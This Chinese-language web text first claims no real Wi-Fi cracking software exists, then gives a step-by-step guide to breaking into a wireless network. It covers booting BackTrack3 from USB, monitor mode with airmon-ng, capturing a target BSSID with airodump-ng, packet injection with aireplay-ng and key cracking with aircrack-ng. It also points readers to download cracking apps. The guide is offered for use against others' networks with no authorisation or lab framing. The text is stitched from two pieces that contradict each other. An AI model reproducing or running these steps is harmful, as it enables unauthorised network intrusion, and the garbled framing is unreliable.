1，現階段相關無線網路破解軟體的出現，大都採用兩種方式進行破解，其中一種破解方式是暴力破解法，即使用窮舉演算法逐個嘗試所有可能的密碼組合，從而達到破解目的。具有代表性的程式有“Wifi快速破解器”。

2，另一種實現破解Wifi網路的方法就是利用共享密碼來實現，具有該功能的軟體有“萬能密碼破解器”，需要的朋友可上網搜尋並下載使用。

3，綜上所述，相信大家應該都明白了無線網路破解的原理了吧。對於無線網路的破解，其實並沒有真正可實現無線網路破解的軟體。

2、將下載好的backtrack3(BT3) usb版,檔案bt3b141207.rar直接解壓到隨身碟（1G以上容量）。把Boot 和BT3兩個資料夾放到隨身碟的根目錄，開啟BOOT資料夾雙擊執行" bootinst.bat "批處理檔案。U盤裡就會多出4個檔案." isolinux.boot" "isolinux.cfg" "isolinux.bin " "syslinux.cfg"

3、之後重啟 windows 進入BIOS設定，把BIOS裡的frist boot device設定為USB-HDD（或者是USB--ZIP）再重啟選擇從usb啟動。系統進入backtrack3 系統。

4、在shell視窗中輸入 ifconfig 命令 ，出現如下資訊： 　　lo no wireless extensions. 　　..........　　Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0 　　Tx excessive retries:0 Invalid misc:0 Missed beacon:0

5、找出你的無線網絡卡名字，我這裡是 eth1.再啟動你的網絡卡為Moniter模式(輸入airmon-ng start eth1 11)。再輸入 ifconfig 命令 ，返回如下資訊： 　　lo no wireless extensions. 　　..........　　Tx excessive retries:0 Invalid misc:0 Missed beacon:0

6、輸入命令 airodump-ng -c 11 --bssid 00:1A:01:8D:C3:B2 -w outputs eth1. 　　命令中的11 表示要破解的頻道號，bssid後面的數字表示破解目標的MAC物理地址，outputs表示要生成的包的名稱。回車執行。

7、再開一個 shell 輸入 aireplay-ng -1 0 -e targetnet -a 00:1A:01:8D:C3:B2 -h 00:A1:C1:D8:A5:B6 eth1 　　其中“targetnet”表示破解目標網路名,00:1A:01:8D:C3:B2前面已解釋過是指目標MAC物理地址，00:A1:C1:D8:A5:B6表示本機網絡卡MAC物理地址

8、再開一個 shell 輸入 aireplay-ng -3 -b 00:1A:01:8D:C3:B2 -h 00:A1:C1:D8:A5:B6 eth1 獲取更多的資料包。 返回資料量到1萬的時候就可以破解了。再開一個shell輸入 aircrack-ng -z -b 00:1A:01:8D:C3:B2 outputs.cap 進行破解。如果破解不成功，讓它繼續抓包，直到破解。